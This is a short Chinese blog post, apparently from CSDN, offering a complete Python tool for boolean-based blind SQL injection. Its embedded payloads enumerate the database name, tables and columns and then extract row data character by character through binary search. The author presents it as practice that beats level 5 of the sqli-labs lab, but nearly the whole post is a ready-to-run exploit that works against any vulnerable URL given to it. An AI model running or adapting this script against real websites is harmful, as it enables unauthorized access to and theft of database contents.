python脚本之布尔盲注

这个好像也没什么可以多说了,那么直接上脚本吧

import optparse
import requests
#----------------------------
usage = "python3 %prog -u <URL>  -P <patten> -F <find text>"
parser = optparse.OptionParser(usage) #创建对象实例
parser.add_option('-u','--url',dest='url',help='target url')
parser.add_option('-P','--patten',dest='patten',help='patten')
parser.add_option('-F','--find',dest='text',help='find text')
parser.add_option('-T','--tbname',dest='tbname',help='target table_name')
parser.add_option('-C','--clname',dest='clname',help='target column_name')
(options,args)=parser.parse_args()
#-------------------------------

#payload

ck_dblen  = " and length(database())={0} --+"
ck_dbname = " and ascii(substr(database(),{0},1))>{1} --+"
ck_tbnum  = " and (select count(table_name) from information_schema.tables where table_schema=database())={0}--+"
ck_tbname = " and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {0},1),{1},1))>{2} --+"
ck_clnum  = " and (select count(column_name) from information_schema.columns where table_name='{1}')={0}--+"
ck_clname = " and ascii(substr((select column_name from information_schema.columns where table_name='{0}' limit {1},1),{2},1))>{3} --+"
ck_data = " and ascii(substr((select {0} from {1} limit {2},1),{3},1))>{4} --+"



def _dbname():
    for i in range(1,20):
        # ck_dblen  = " and length(database())={0} --+"
        payload = options.url + ck_dblen.format(i) #ck_dblen
        res = requests.get(payload)
        if res.text.find(options.text)>1:
            print("db_length: ",i)
    dbname = ''
    for k in range(1, i+1):
        lmin = 33
        lmax = 127
        while lmax - lmin > 1:
            mid = (lmin + lmax) >> 1
            # ck_dbname = " and ascii(substr(database(),{0},1))>{1} --+"
            payload = options.url + ck_dbname.format(k, mid) #ck_dbname
            res = requests.get(payload)
            if res.text.find(options.text) > 1:
                lmin = mid
            else:
                lmax = mid
        dbname += chr(lmax)
    print(dbname.replace(chr(lmax),''))



def _tbname():
    s = 0
    for i in range(1,20):
        # ck_tbnum  = " and (select count(table_name) from information_schema.tables where table_schema=database())={0}--+"
        payload = options.url + ck_tbnum.format(i) #ck_tbnum
        res = requests.get(payload)
        if res.text.find(options.text)>1:
            s = i
            print("Fetch {0} tables: ".format(i))
    num = 0
    while (s - num > 0):
        tbname = '' #在循环里可以换行
        for k in range(1,20):
            lmin = 33
            lmax = 127
            while lmax - lmin > 1:
                mid = (lmin+lmax) >> 1
                # ck_tbname = " and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {0},1),{1},1))>{2} --+"
                payload = options.url + ck_tbname.format(num,k,mid) #ck_tbname
            #   print(payload)
                res = requests.get(payload)
                if res.text.find(options.text) > 1:
                    lmin = mid
                else:
                    lmax = mid
            tbname += chr(lmax)
        print(tbname.replace(chr(lmax),''))
        num += 1




def _clname():
    #------------------------check column num
    s = 0 #定义初始变量s为column的num
    for i in range(1, 20):
        # ck_clnum  = " and (select count(column_name) from information_schema.columns where table_name='{1}')={0}--+"
        payload = options.url + ck_clnum.format(i,options.tbname) #ck_clnum
        res = requests.get(payload)
        if res.text.find(options.text) > 1:
            s = i
            print("Fetch {0} columns".format(i))
    #-------------------------------------
    num = 0
    while (s - num >0): #s为字段数量
        clname = ''
        for k in range(1,20): #一位一位爆
            lmin =33
            lmax =127
            while lmax - lmin > 1:
                mid = (lmin+lmax) >> 1
                # ck_clname = " and ascii(substr((select column_name from information_schema.columns where table_name='{0}' limit {1},1),{2},1))>{3} --+"
                payload = options.url + ck_clname.format(options.tbname,num,k,mid) #ck_clname
                #print(payload)
                res = requests.get(payload)
                if res.text.find(options.text) > 1:
                    lmin = mid
                else:
                    lmax = mid
            clname += chr(lmax)
        print(clname.replace(chr(lmax), ''))
        num +=1

# ck_data = " and ascii(substr((select {0} from {1} limit {2},1),{3},1))>{4} --+"
                                #clname   tbname    num     k      mid
def _getdata():
    num = 0
    while (num < 20):
        data = ''
        for k in range(1,15):
            lmin = 33
            lmax = 127
            while lmax - lmin > 1:
                mid = (lmin+lmax) >> 1
                payload = options.url + ck_data.format(options.clname,options.tbname,num,k,mid)
                res = requests.get(payload)
                if res.text.find(options.text) > 1:
                    lmin = mid
                else:
                    lmax = mid
            data += chr(lmax)
        print(data.replace(chr(lmax),''))
        num += 1



if(options.text) and (options.tbname) and (options.clname):
    _getdata()
elif (options.text) and (options.tbname):
    _clname()
elif(options.text):
    _dbname()
    _tbname()

真·shui文,hh
大概用法就是:

python python.py -F 需要查找的文本 -u URL 

这样可以爆出数据库名和表名

python python.py -F 需要查找的文本 -u URL -T 表名

这样可以爆出字段名

python python.py -F 需要查找的文本 -u URL -T 表名 -C 字段名

爆数据
亲测sqlilab第五关随便通,还是挺有用的,后续有机会的话再添加功能吧,慢慢来。

©️2020 CSDN 皮肤主题: 撸撸猫 设计师:设计师小姐姐 返回首页